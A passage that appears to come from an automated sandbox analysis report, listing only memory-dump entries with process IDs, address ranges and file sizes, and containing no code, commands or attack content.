                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  628KB

                                                                                                                                                                                                                                                                                                                                                • memory/4032-403-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                • memory/4140-417-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                • memory/4140-166-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                • memory/4192-320-0x0000000000400000-0x000000000041E000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  120KB

                                                                                                                                                                                                                                                                                                                                                • memory/4192-323-0x000000000041884E-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                • memory/4192-354-0x0000000005100000-0x0000000005706000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  6.0MB

                                                                                                                                                                                                                                                                                                                                                • memory/4192-357-0x0000000005200000-0x0000000005201000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                                • memory/4192-336-0x0000000005160000-0x0000000005161000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                                • memory/4192-339-0x00000000051C0000-0x00000000051C1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                                • memory/4220-428-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                • memory/4232-416-0x0000000004CD4000-0x0000000004CD6000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  8KB

                                                                                                                                                                                                                                                                                                                                                • memory/4232-414-0x0000000004CD3000-0x0000000004CD4000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                                • memory/4232-405-0x0000000000400000-0x00000000004D7000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  860KB

                                                                                                                                                                                                                                                                                                                                                • memory/4232-413-0x0000000004CD2000-0x0000000004CD3000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                                • memory/4232-406-0x0000000004CD0000-0x0000000004CD1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                                • memory/4232-228-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                • memory/4232-404-0x00000000001C0000-0x00000000001EF000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  188KB

                                                                                                                                                                                                                                                                                                                                                • memory/4244-281-0x0000000005020000-0x0000000005021000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                                • memory/4244-274-0x00000000007D0000-0x00000000007D1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                                • memory/4244-227-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                • memory/4244-295-0x0000000005190000-0x0000000005191000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                                • memory/4244-288-0x0000000004FA0000-0x0000000004FA1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                                • memory/4296-168-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                • memory/4332-277-0x00000000004C0000-0x00000000004C1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                                • memory/4332-309-0x0000000005480000-0x0000000005481000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                                • memory/4332-298-0x0000000004E70000-0x0000000004E71000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                                • memory/4332-240-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                • memory/4380-335-0x0000000000B90000-0x0000000000B9D000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  52KB

                                                                                                                                                                                                                                                                                                                                                • memory/4380-273-0x0000000000430000-0x0000000000431000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                                • memory/4380-229-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                • memory/4380-313-0x0000000004BD0000-0x0000000004BD1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                                • memory/4392-304-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                • memory/4408-205-0x0000000004870000-0x00000000048CD000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  372KB

                                                                                                                                                                                                                                                                                                                                                • memory/4408-203-0x000000000476B000-0x000000000486C000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  1.0MB

                                                                                                                                                                                                                                                                                                                                                • memory/4408-175-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                • memory/4448-245-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                • memory/4472-230-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                • memory/4472-396-0x00000000001C0000-0x00000000001CA000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  40KB

                                                                                                                                                                                                                                                                                                                                                • memory/4484-180-0x00007FF71D1A4060-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                • memory/4484-216-0x000001E333D40000-0x000001E333DB1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  452KB

                                                                                                                                                                                                                                                                                                                                                • memory/4508-231-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                • memory/4508-266-0x000001CEAE760000-0x000001CEAE761000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                                • memory/4548-303-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                • memory/4560-306-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                • memory/4560-369-0x0000000001550000-0x0000000001551000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                                • memory/4560-337-0x0000000077830000-0x00000000779BE000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  1.6MB

                                                                                                                                                                                                                                                                                                                                                • memory/4560-348-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                                • memory/4568-345-0x000001431DB50000-0x000001431DC21000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  836KB

                                                                                                                                                                                                                                                                                                                                                • memory/4568-232-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                • memory/4568-343-0x000001431D660000-0x000001431D6D0000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  448KB

                                                                                                                                                                                                                                                                                                                                                • memory/4596-233-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                • memory/4604-287-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                • memory/4640-444-0x00000185891C0000-0x00000185891DB000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  108KB

                                                                                                                                                                                                                                                                                                                                                • memory/4640-293-0x0000018589100000-0x000001858914E000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  312KB

                                                                                                                                                                                                                                                                                                                                                • memory/4640-442-0x000001858BB00000-0x000001858BC06000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  1.0MB

                                                                                                                                                                                                                                                                                                                                                • memory/4640-297-0x0000018589440000-0x00000185894B4000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  464KB

                                                                                                                                                                                                                                                                                                                                                • memory/4640-289-0x00007FF71D1A4060-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                • memory/4664-308-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                • memory/4704-319-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                • memory/4716-241-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                • memory/4768-290-0x000000001B510000-0x000000001B512000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  8KB

                                                                                                                                                                                                                                                                                                                                                • memory/4768-267-0x0000000000810000-0x0000000000811000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                                • memory/4768-278-0x0000000000C60000-0x0000000000C61000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                                • memory/4768-242-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                • memory/4768-296-0x0000000000C70000-0x0000000000C93000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  140KB

                                                                                                                                                                                                                                                                                                                                                • memory/4768-301-0x0000000000CB0000-0x0000000000CB1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                                • memory/4780-312-0x0000000000680000-0x0000000000681000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                                • memory/4780-307-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                • memory/4780-374-0x0000000000FB0000-0x0000000000FB2000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  8KB

                                                                                                                                                                                                                                                                                                                                                • memory/4852-243-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                • memory/4852-390-0x00000000004E0000-0x000000000062A000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  1.3MB

                                                                                                                                                                                                                                                                                                                                                • memory/4852-391-0x0000000000400000-0x00000000004DE000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  888KB

                                                                                                                                                                                                                                                                                                                                                • memory/4864-255-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                • memory/4888-244-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                • memory/5052-381-0x0000020367E70000-0x0000020367EDE000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  440KB

                                                                                                                                                                                                                                                                                                                                                • memory/5052-384-0x0000020367EE0000-0x0000020367FAF000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  828KB

                                                                                                                                                                                                                                                                                                                                                • memory/5052-316-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                • memory/5344-332-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                • memory/5344-346-0x0000000004CC0000-0x0000000004CC1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                                • memory/5344-340-0x00000000003D0000-0x00000000003D1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                                • memory/5372-421-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                • memory/5460-352-0x000000000041888A-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                • memory/5460-365-0x0000000005010000-0x0000000005011000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                                                                                                • memory/5460-372-0x0000000004E30000-0x000000000532E000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  5.0MB

                                                                                                                                                                                                                                                                                                                                                • memory/5460-349-0x0000000000400000-0x000000000041E000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  120KB

                                                                                                                                                                                                                                                                                                                                                • memory/5492-351-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                • memory/5736-393-0x0000000005710000-0x0000000005D16000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  6.0MB

                                                                                                                                                                                                                                                                                                                                                • memory/5736-380-0x0000000000418836-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                • memory/5872-382-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                • memory/5924-385-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                • memory/6052-394-0x0000000000402E1A-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                • memory/6052-397-0x0000000000400000-0x0000000000409000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                  36KB

                                                                                                                                                                                                                                                                                                                                                • memory/6128-398-0x0000000000000000-mapping.dmp